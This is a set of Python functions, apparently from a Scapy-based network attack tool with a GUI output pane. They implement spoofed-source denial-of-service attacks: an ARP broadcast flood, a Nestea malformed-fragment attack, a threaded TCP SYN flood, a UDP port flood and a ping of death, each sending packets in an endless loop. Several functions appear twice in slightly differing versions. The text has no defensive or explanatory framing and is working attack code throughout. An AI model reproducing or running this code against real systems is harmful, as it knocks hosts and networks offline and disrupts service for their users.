def __send_macs(quiet,terminal): spoofaddr=spoof_addr(terminal=terminal) packet = Ether(src=random_mac(),dst='ff:ff:ff:ff:ff:ff')/ARP(op=2,psrc=spoofaddr,hwdst='ff:ff:ff:ff:ff:ff') while True: send(packet,verbose=0) if not quiet: if terminal == None: print("[+] Packet successfully sent\n[+] Packet: "+packet.summary()) else: terminal.configure(text=terminal.cget("text")+'\n[+] Packet successfully sent \n[+] Packet: '+packet.summary())
def nestea(target,terminal = None): if terminal == None: print("[+] Sending malformed UDP packets to "+target) else: terminal.configure(text=terminal.cget("text")+'\n[+] Sending malformed UDP packet to '+target) while True: spoofaddr = spoof_addr(terminal=terminal) send(IP(dst=target,src=spoofaddr,id=42,flags='MF')/UDP()/('X'*10),verbose=0) send(IP(dst=target,src=spoofaddr,id=42,frag=48)/("X"*116),verbose=0) send(IP(dst=target,src=spoofaddr,id=42,flags='MF')/UDP()/('X'*224),verbose=0)
def SYNflood(victim,port,quiet,THREAD_COUNT,terminal = None): if terminal == None: print("[+] Flooding "+victim+" with TCP SYN packets on port "+str(port)) else: terminal.configure(text=terminal.cget("text")+'\n[+] Flooding '+victim+" with TCP SYN packets on port "+str(port)) all_threads = [] tc = THREAD_COUNT spoofaddr = spoof_addr(terminal=terminal) for i in range(tc): t = threading.Thread(target=__floodtarget,args=(victim,port,spoofaddr,quiet)) t.start() all_threads.append(t)
def __flood_udp(step,start,victim,quiet,terminal): try: spoofaddr = spoof_addr(terminal) while True: for port in range(start,65535,step): packet = IP(src=spoofaddr,dst=victim)/UDP(dport=port) send(packet,verbose=0) if not quiet: terminal.write('\n[+] Packet send to port '+str(port)+" ID: "+str(packet.summary())) except Exception as s: terminal.write('\n'+str(s)) traceback.print_exc()
def __send_macs(quiet, terminal): try: spoofaddr = spoof_addr(terminal=terminal) packet = Ether(src=random_mac(), dst='ff:ff:ff:ff:ff:ff') / ARP( op=2, psrc=spoofaddr, hwdst='ff:ff:ff:ff:ff:ff') while True: send(packet, verbose=0) if not quiet: terminal.write( '\n[+] Packet successfully sent \n[+] Packet: ' + packet.summary()) except Exception as s: terminal.write('\n' + str(s)) traceback.print_exc()
def __flood_udp(step, start, victim, quiet, terminal): spoofaddr = spoof_addr(terminal=terminal) while True: for port in range(start, 65535, step): packet = IP(src=spoofaddr, dst=victim) / UDP(dport=port) send(packet, verbose=0) if not quiet: if terminal == None: print("[+] Packet send to port " + str(port) + " ID: " + str(packet.summary())) else: terminal.configure(text=terminal.cget("text") + '\n[+] Packet send to port ' + str(port) + " ID: " + str(packet.summary()))
def SYNflood(victim, port, quiet, THREAD_COUNT, terminal): try: terminal.write('\n[+] Flooding ' + victim + " with TCP SYN packets on port " + str(port)) all_threads = [] tc = THREAD_COUNT spoofaddr = spoof_addr(terminal=terminal) for i in range(tc): t = threading.Thread(target=__floodtarget, args=(victim, port, spoofaddr, quiet, terminal)) t.start() all_threads.append(t) except Exception as s: terminal.write('\n' + str(s)) traceback.print_exc()
def nestea(target, terminal): try: terminal.write('\n[+] Sending malformed UDP packet to ' + target) while True: spoofaddr = spoof_addr(terminal=terminal) send(IP(dst=target, src=spoofaddr, id=42, flags='MF') / UDP() / ('X' * 10), verbose=0) send(IP(dst=target, src=spoofaddr, id=42, frag=48) / ("X" * 116), verbose=0) send(IP(dst=target, src=spoofaddr, id=42, flags='MF') / UDP() / ('X' * 224), verbose=0) except Exception as s: terminal.write('\n' + str(s)) traceback.print_exc()
def ping_of_death(victim, quiet, terminal): try: spoofaddr = spoof_addr(terminal=terminal) packet = fragment( IP(src=spoofaddr, dst=victim) / ICMP() / ("w" * 60000)) terminal.write('\n[+] Sending malformed ICMP packets to ' + victim) while True: for p in packet: send(p, verbose=0) if not quiet: terminal.write('\n[+] Packet Sent // ' + str(p.summary())) sleep(2) except Exception as s: terminal.write('\n' + str(s)) traceback.print_exc()
def ping_of_death(victim, quiet, terminal=None): spoofaddr = spoof_addr(terminal=terminal) packet = fragment(IP(src=spoofaddr, dst=victim) / ICMP() / ("w" * 60000)) if terminal == None: print("[+] Sending malformed ICMP packets to " + victim) else: terminal.configure(text=terminal.cget("text") + '\n[+] Sending malformed ICMP packets to ' + victim) while True: for p in packet: send(p, verbose=0) if not quiet: if terminal == None: print("[+] Packet Sent // " + p.summary()) else: terminal.configure(text=terminal.cget("text") + '\n[+] Packet Sent // ' + str(p.summary())) sleep(2)